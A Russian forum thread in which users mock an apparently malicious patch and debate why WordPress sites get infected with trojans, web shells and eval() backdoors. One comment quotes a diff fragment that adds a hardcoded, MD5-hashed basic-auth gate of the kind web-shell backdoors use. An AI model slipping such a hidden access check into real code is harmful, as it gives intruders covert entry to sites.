LINUX.ORG.RU

homakov commented
rebase pls, I will merge then

:D

GArik ★★★
()

насколько я понял весь прикол в

15 +$auth = 1;
16 +$name='4ced0e3abe1ac578c40152b1a2cf6583'; // Saudi
17 +$pass='4ced0e3abe1ac578c40152b1a2cf6583'; // Saudi
18 +if($auth == 1) {
19 +if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
20 + {

ymuv ★★★★
()

Адское решето этот вордпресс, Большинство сайтов, которые заражены всякими JS.Trojan.Downloader-ами на вордпрессе.

PaRuSoft ★★★★
()
Ответ на: комментарий от PaRuSoft

Просто обновляться надо. Учитывая процесс в один клик, я не понимаю тех, кто не ставит обновления безопасности.

pekmop1024 ★★★★★
()
Ответ на: комментарий от PaRuSoft

Это всего лишь последствия того, что установить и использовать wp может любой человек в пару кликов мышкой. И практически всегда этот человек даже не подозревает о каких-либо мерах безопасности.

dinn ★★★★★
()
Ответ на: комментарий от wxw

Замкнутый круг. Скрипт на сайте скачивает троян, который ворует эти пароли.

По поводу обновления. Меня бесят конторы, которые делают сайты на вордпрессе, друпале, джумле и т.д. за неплохие деньги и забивают на дальнейшше развитие. Тут может быть несколько причин - либо у заказчика на шее сидит земноводное, либо «прогромисты-сайтоклепатели» этой конторы ничего не хотят делать. А потом, когда грянет гром, на сайте дрянь, гугл и яндекс радостно рапортуют том что сайт представляет угрозу для компьютера, владельцы сайта бегут за помощью к другим конторам, которые занимаются лечением сайтов (а деньги берут за это немалые). И тут срабатывает поговорка про скупого, который платит дважды.

PaRuSoft ★★★★
()
Ответ на: комментарий от PaRuSoft

У сайтегов за 500 баксов по определению не может быть нормального цикла развития. Не предусмотрено в бюджете.
Школьники кое-как навалят плагинов, нарисуют скин да поковыряют ядро, что на него потом дышать страшно, не то что обновлять, при всём желании.

wxw ★★★★★
()
Ответ на: комментарий от wxw

поковыряют ядро, что на него потом дышать страшно, не то что обновлять, при всём желании.

В точку.

PaRuSoft ★★★★
()
Ответ на: комментарий от wxw

Не, причина таки обычно в дырах в самом движке и установленных модулях. По FTP тоже некоторых ломают, но это не так популярно.

om-nom-nimouse ★★
()
Ответ на: комментарий от stevejobs

а как же обладатели всяких локализованных и твиканных версий, которые обновлений полгода ждут?

Это же как сборки XP - говноедство. Говноеды должны страдать.

pekmop1024 ★★★★★
()
Ответ на: комментарий от wxw

Как раз наоборот. В логах фтп глухо (причём юзер их даже считать от себя не может - нос не дорос), а на сайте ёбом шеллов и спамилок.

svr4
()
Ответ на: комментарий от svr4

ЗЫ: Как правило такое пару раз вычищается, если на том конце провода совсем невменяемые блондинки - давай досвидания. Ибо сидеть и перетряхивать бешеные тысячи скриптов в поисках очередного ебучего eval() в задачи админа хостинга не входит.

svr4
()

спасибо, поржал, пацаны-хакеры — они такие, да...

cetjs2 ★★★★★
()
Ответ на: комментарий от svr4

значит нефиг повсюду раздавать 777 и ставить плагины без аудита
вордпрес тормоз и mvc там не валялся, но майнтейнится хорошо, дыр в нем практически нет, а известные закрываются быстро

wxw ★★★★★
()
Ответ на: комментарий от feofil

Это кто же ему привилегии на запись даст?

На всех нормальных шаредах юзер может писать в пределах хомяка. Что не так-то?

pekmop1024 ★★★★★
()
Ответ на: комментарий от pekmop1024

Что не так-то?

Безопасность. Когда скрипт имеет возможность записи сам в себя ... впрочем, про php и безопасность говорили уже столько, что и повторять незачем.

feofil
()
Ответ на: комментарий от stevejobs

еще год назад это было не так. сейчас - не знаю.

В 2010 ставил локализованную версию WP. С русским языком.

ekzotech ★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.
Talks